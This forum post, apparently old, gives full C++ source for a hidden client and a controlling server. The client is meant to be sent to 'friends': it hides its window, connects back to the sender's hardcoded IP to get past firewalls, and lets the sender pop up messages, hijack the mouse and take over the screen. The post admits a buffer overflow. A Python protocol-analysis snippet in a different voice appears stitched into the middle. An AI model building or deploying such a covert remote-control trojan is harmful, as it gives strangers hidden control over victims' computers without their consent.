Architecture: N/a
Description:
I was digging through my old programs on my ancient machine and ran across a VERY old program I made. It is VERY messy, and very dirty coding, but it gets the job done; I also observed it is possible to exploit a buffer overflow.
Here it is, feel free to modify tweak and fine tune it to your advantage.
The way it works is there is a client and a server (both codes below). I initially made this program to send to my friends and execute harmless code for a laugh because I had just learned Winsock. The client connects to the server. However, unlike traditional remote tools, it is the SERVER that is executing commands on the CLIENT PC. This is done so that even if the 'victim' had a firewall/router they would be connecting to ME and a connection is always guaranteed. In short, you will be 'hosting' a server on your PC that will wait for anyone to open the client exe. When opened it will inform you that a connection has been made and will wait for an input (command line).
For FURTHER clarification, you will be making 2 exe's. One that you run, one that you send your friends.
It should be noted that you need to link against the following library:
Code:
    wsock32.lib
Disclaimer: You know what I'm going to say. I'm not responsible for your stupidity. I'm here to teach the concept of Windows sockets and over-the-wire communication, not Trojan building.
Server code (you will be running this exe)
Code:
    #include <windows.h> //Required for socket init (also pulls in winsock.h)
    #include <iostream>
    #include <cstring>   //strcmp
    using namespace std;

    int main(){
        std::cout<<"----Server command console----\n";
        std::cout<<"__Grim\n";
        char buf[200];
        WSAData wsdata; //Declare WSAData
        WORD wsver=MAKEWORD(2, 0); //We want Winsock 2.0
        int nret=WSAStartup(wsver, &wsdata); //Pass version 2.0 and a pointer to the implementation details
        if(nret != 0){ //Init failed
            /*A successful return value should be 0 */
            std::cout<<"Startup failed, error code: "<<WSAGetLastError(); //Returns error code
            WSACleanup(); //Cleanup Winsock library
            return -1;
        }
        std::cout<<"Init success\n";
        SOCKET kSock=socket(AF_INET, SOCK_STREAM, 0);
        if(kSock == INVALID_SOCKET){
            std::cout<<"Socket init failed";
            WSACleanup(); //Cleanup Winsock library
            return -1;
        }
        std::cout<<"Socket initialized\n";
        sockaddr_in sin;
        sin.sin_port=htons(1337); // This is the port you are listening on. Make sure it matches in the client as well.
        sin.sin_addr.s_addr=INADDR_ANY; // This means any ip can connect to you. You can tweak it, but i see no point.
        sin.sin_family=AF_INET;
        if(bind(kSock,(sockaddr*)&sin, sizeof(sin)) == SOCKET_ERROR){
            std::cout<<"Failed to bind\n";
            WSACleanup(); //Cleanup Winsock library
            return -1;
        }
        std::cout<<"Bind successful!\n";
    CON:
        std::cout<<"Now waiting for target connection...\n";
        while (listen(kSock, SOMAXCONN) == SOCKET_ERROR); //Loop in order to constantly listen
        // Anything from this point on assumes someone has connected
        SOCKET client; // Your first socket.
        int len = sizeof(sin);
        client=accept(kSock, (sockaddr*)&sin, &len); //Accepting the connection.
        std::cout<<"Connection established!\n";
        //Set a label called CMD
    CMD:
        // ************** This is where your program will start visually to you ***************
        std::cout<<"_Command >: "; //I don't know why i used std:: since it's already in the std namespace, but just to be safe i'll leave it here.
        std::cin.getline(buf,sizeof(buf)); //The buffer was declared all the way at the top and is 200 chars. Feel free to reduce it, that's what i would do.
        //Compare the buffer to a hard-coded list of commands. This will make more sense when you read the command list at the end of this forum post.
        if(strcmp(buf,"pop")==0){
            send(client, buf, sizeof(buf), 0); //Send it over the wire to the client. (All it is sending is the contents of the buffer .. or the word 'pop')
            std::cout<<"_Sub Command >: "; //This specific command expects a sub command
            std::cin.getline(buf,sizeof(buf));
            send(client, buf, sizeof(buf), 0); //Send
            goto CMD; //Go back up so we can send another command.
        }
        if(strcmp(buf,"end")==0){
            send(client, buf, sizeof(buf), 0); //Send
            std::cout<<" Client Connection closed.\n";
            std::cout<<" Client Process terminated.\n";
            std::cout<<" Now Re-initializing...\n";
            goto CON; //Goes back up to the CON label to reinit.
        }
        if(strcmp(buf,"exit")==0){
            send(client, "end", 3, 0); //Send
            closesocket(client); //Close both socket handles
            closesocket(kSock);
            WSACleanup();
            exit(0);
        }
        else{
            //The above are the only exceptions where something needs to be done before it is sent to the client. So if it is another command, just send it over the wire and go back to send another command.
            send(client, buf, sizeof(buf), 0); //Send
            goto CMD;
        }
        return 0;
    }
Simple enough. Compile it.
Now the harder part.
Client code (you will be sending this exe to friends)
Code:
    #undef _WIN32_WINNT //For hiding/showing window (GetConsoleWindow needs 0x0500)
    #define _WIN32_WINNT 0x0500
    #include <windows.h> //Required for socket init (also pulls in winsock.h)
    #include <iostream>
    #include <stdlib.h>
    #include <iomanip>
    #include <stdio.h>
    #include <string.h> //strcmp
    #include <conio.h>
    #include <fstream>
    using namespace std;

    //function declaration prototypes
    void crazyMouse(BOOL cmProc);
    void Matrix(BOOL pwnProc);
    char procCmd(char buff[200], SOCKET * fSocket);
    void PoP(char message[200]);

    // static variables (Don't know why i did this)
    static BOOL pwnProc = false;
    static BOOL pop = false;
    //pointer to socket
    SOCKET * pSock;
    //for matrix
    HWND hWnd = GetConsoleWindow();

    int main(){
        // First thing we want to do is make sure that our console is in-fucking-visible
        ShowWindow( hWnd, SW_HIDE );
        //Begin winsock chunk
        char buf[256];
        WSAData wsdata;
        WORD wsver=MAKEWORD(2, 0); //We want Winsock 2.0
        int nret=WSAStartup(wsver, &wsdata); //Pass version 2.0 and a pointer to the implementation details
        if(nret != 0){ //Init failed
            /*A successful return value should be 0 */
            std::cout<<"Startup failed, error code: "<<WSAGetLastError(); //Returns error code
            WSACleanup(); //Cleanup Winsock library
            return -1;
        }
        std::cout<<"Init success\n";
        SOCKET kSock=socket(AF_INET, SOCK_STREAM, 0);
        if(kSock == INVALID_SOCKET){
            std::cout<<"Socket init failed";
            WSACleanup(); //Cleanup Winsock library
            return -1;
        }
        std::cout<<"Socket initialized\n";
        sockaddr_in sin;
        //****PORT HERE****
        sin.sin_port=htons(1337); //Connect to port 1337
        //****PORT HERE****
        //
        ////////////***************IP HERE////////////***************
        sin.sin_addr.s_addr=inet_addr("172.16.3.161"); //Connect to this ip (Should be your ip, so the victim connects to you)
        ////////////***************IP HERE////////////***************
        //
        sin.sin_family=AF_INET;
        if(connect(kSock,(sockaddr*)&sin, sizeof(sin)) == SOCKET_ERROR){ //Check the condition
            std::cout<<"Connect failed, error: "<<WSAGetLastError(); //Returns error code
            WSACleanup(); //Cleanup the library
            return -1;
        }
        std::cout<<"Connection successful!\n";
        pSock = &kSock;
        //***************************************************
        // The program will always come back to REC to re-receive and re-compare commands.
    REC:
        while (recv(kSock, buf, sizeof(buf), 0)){ //while a command is received (recv() returns SOCKET_ERROR, i.e. -1, on failure, which is non-zero and so also keeps this loop going)
            procCmd(buf,pSock); //push the received command into the procCmd function to be compared with a command list
        }
        goto REC; //Back up
        return 0;
    }

    //***************************************************
    /////////////// BEGIN COMMAND LIST /////////////////
    //the procCmd function means ProcessCommand and is responsible for handling commands.
    // If you are going to add new commands to this program you should start here.
    char procCmd(char buff[200], SOCKET* fSocket){
        // needs to be reinit'd cuz of cross function
        SOCKET kSock = *fSocket;
        /* This is where the magic happens, the received commands are compared to a hard coded list of commands. If it recognizes a command, it is sent to the appropriate function (or just executed if the code is small). I initially added in character return values so i could resend them back to the server (me) to verify if a command was executed or not. I never got around to it, maybe you can?*/
        if (pop == true){ /*Pop is a special command because it displays a message box on the user's screen. So the command pop would first need to be written, which would make pop==true. Once it's true, it will be expecting another sub-command for the actual contents of the messagebox, this is why the server-side code needed to deal with the pop command, so that it could prompt the user to input a sub command, i don't know why i did it this way.*/
            PoP(buff);
            pop = false;
            return '1';
        }
        if (strcmp(buff,"pop")==0){
            pop = true;
            return '1';
        }
        if (strcmp(buff,"end")==0){
            closesocket(kSock);
            exit(0);
        }
        if (strcmp(buff,"-")==0){
            ShowWindow( hWnd, SW_HIDE );
            return '1';
        }
        if (strcmp(buff,"+")==0){
            ShowWindow( hWnd, SW_SHOW );
            return '1';
        }
        if (strcmp(buff,"pwn")==0){
            Matrix(true);
            return '1';
        }
        if (strcmp(buff,"unpwn")==0){
            Matrix(false);
            //clean up
            ShowWindow( hWnd, SW_HIDE );
            return '1';
        }
        if (strcmp(buff,"crazymouse")==0){
            crazyMouse(true);
            return '1';
        }
        if (strcmp(buff,"uncrazy")==0){ //not working
            crazyMouse(false);
            return '1';
        }
        return '0';
    }

    /////////////// BEGIN EXECUTABLE FUNCTIONS ////////////////////////////
    // Pop up message - Grim
    void PoP(char message[200]){
        MessageBox(NULL,message,NULL,MB_OK);
    }

    /* this thing is really cute, it puts the dialog box into full screen and displays a bunch of green random text like the matrix. If you want to stop it manually just press alt+enter to get out of fullscreen then close it.*/
    // Matrix, total annihilation - Grim
    void Matrix(BOOL pwnProc){
        if (pwnProc==true) {
            // make sure it's visible
            ShowWindow( hWnd, SW_SHOW );
            // synthesize alt+enter to toggle the console to full screen
            keybd_event(VK_MENU,0x38,0,0);
            keybd_event(VK_RETURN,0x1c,0,0);
            keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
            keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
            HANDLE outToScreen;
            outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);
        START:
            for(int i = 0; i < 1; i++)
            {
                int num = (rand() % 10);
                SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
                cout << setw(4) << num;
                cout << setw(4) << "0%";
                cout << setw(4) << "P";
                cout << setw(4) << " ";
                cout << setw(4) << ")";
                cout << setw(4) << "#";
                cout << setw(4) << "X";
                cout << setw(4) << "@";
                cout << setw(4) << "1&";
                cout << setw(4) << "*";
                cout << setw(4) << "||";
                cout << setw(4) << " \a";
                Sleep(60);
            }
            for ( int j = 0; j < 5; j++)
            {
                SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
                int number = (rand() % 24);
                cout << setw(4) << number;
            }
            goto START; // never returns, so the recv() loop in main never sees "unpwn"
        }
    }

    //Crazy mouse - Grim
    void crazyMouse(BOOL cmProc){
        if(cmProc==true){
            do{ // loops forever for the same reason: "uncrazy" is never received
                Sleep(900);
                int x = rand()%1000;
                int y = rand()%700;
                SetCursorPos(x, y);
            }
            while (cmProc==true);
        }
    }
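The fixed-size send()/recv() pairing above is worth modelling from the analyst's side. The following Python is an added example, not code from the post: it re-frames a captured server-to-client stream the way the client's strcmp() sees it, and shows that once TCP has queued two frames, the client's 256-byte recv() both drops a command and ends up holding a buffer with no terminator (the overflow the author mentions). The 0x90 padding is a constructed stand-in for the uninitialised bytes after the NUL that the real server sends.

```python
FRAME = 200        # server: sizeof(buf) handed to send()
CLIENT_BUF = 256   # client: sizeof(buf) handed to recv()
PAD = b"\x90"      # constructed stand-in for the uninitialised stack bytes after the NUL

def encode_frame(cmd: str) -> bytes:
    """Build one frame exactly as send(client, buf, sizeof(buf), 0) does: the command,
    its NUL terminator, then whatever else was sitting in the 200-byte buffer."""
    data = cmd.encode("ascii")
    if len(data) >= FRAME:
        raise ValueError("command does not fit in the 200-byte server buffer")
    return data + b"\x00" + PAD * (FRAME - len(data) - 1)

def c_string(chunk: bytes):
    """What strcmp()/MessageBox() see in the buffer: bytes up to the first NUL, or None
    when there is no terminator and the C code would read past the end of buf."""
    nul = chunk.find(b"\x00")
    return None if nul < 0 else chunk[:nul].decode("ascii", "replace")

def decode_stream(raw: bytes):
    """Analyst-side decoder for a captured server->client stream: re-frame on fixed
    200-byte boundaries and fold 'pop' plus its follow-up message frame into one event."""
    events, pending_pop = [], False
    for i in range(0, len(raw) - len(raw) % FRAME, FRAME):
        text = c_string(raw[i:i + FRAME]) or ""
        if pending_pop:
            events.append(("pop", text))
            pending_pop = False
        elif text == "pop":
            pending_pop = True
        else:
            events.append((text, None))
    return events

def client_view(raw: bytes, chunk_sizes=None):
    """Model the client's recv() loop over the same bytes. chunk_sizes imitates how TCP
    delivers the stream (one entry per recv); default is 'everything that fits'."""
    seen, pos, sizes = [], 0, list(chunk_sizes or [])
    while pos < len(raw):
        n = min(sizes.pop(0) if sizes else CLIENT_BUF, CLIENT_BUF)
        chunk = raw[pos:pos + n]
        pos += len(chunk)
        seen.append(c_string(chunk))
    return seen

# Constructed capture: the server operator typed "pop", then "hi", then "+".
CAPTURE = encode_frame("pop") + encode_frame("hi") + encode_frame("+")

if __name__ == "__main__":
    print(decode_stream(CAPTURE))                  # [('pop', 'hi'), ('+', None)]
    print(client_view(CAPTURE, [200, 200, 200]))   # ['pop', 'hi', '+']  one frame per recv
```

With the default (coalesced) delivery, client_view(CAPTURE) yields "pop", then a run of padding bytes ending in "+", then None: the "hi" message never reaches MessageBox and the last recv() leaves buf unterminated.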
There are bugs, but PLEASE be sure to read annotations/comments before using this code!
Here is a list of commands already coded (not many):
Code:
    Command list:
    pop = Display a message box on the remote client's screen.
    end = End current connection with remote client and wait for another one.
    exit = End current connection with remote client and exit.
    pwn = Scare the shit out of the remote client with a full screen matrix style text flow.
    unpwn = Stop the craziness of the matrix. ** DOES NOT WORK!!! **
    crazymouse = The client loses all control of his mouse and it randomly moves around the screen.
    uncrazy = Undoes the effect of crazy mouse ** DOES NOT WORK!!! **
    + = Shows the program window on the remote client's screen.
    - = Hides the window on the remote client's screen.
You can add your own functions, but be sure you understand how the flow of the program works, because I didn't use classes and it is dirty as hell.
It should be noted that if you want YOUR prompt (the server) to do something before the command is sent over the wire, you should follow my syntax in the code.
Enjoy.
- Grimsoul
*Edit: The ip included in this post is not mine, feel free to do whatever you want to it.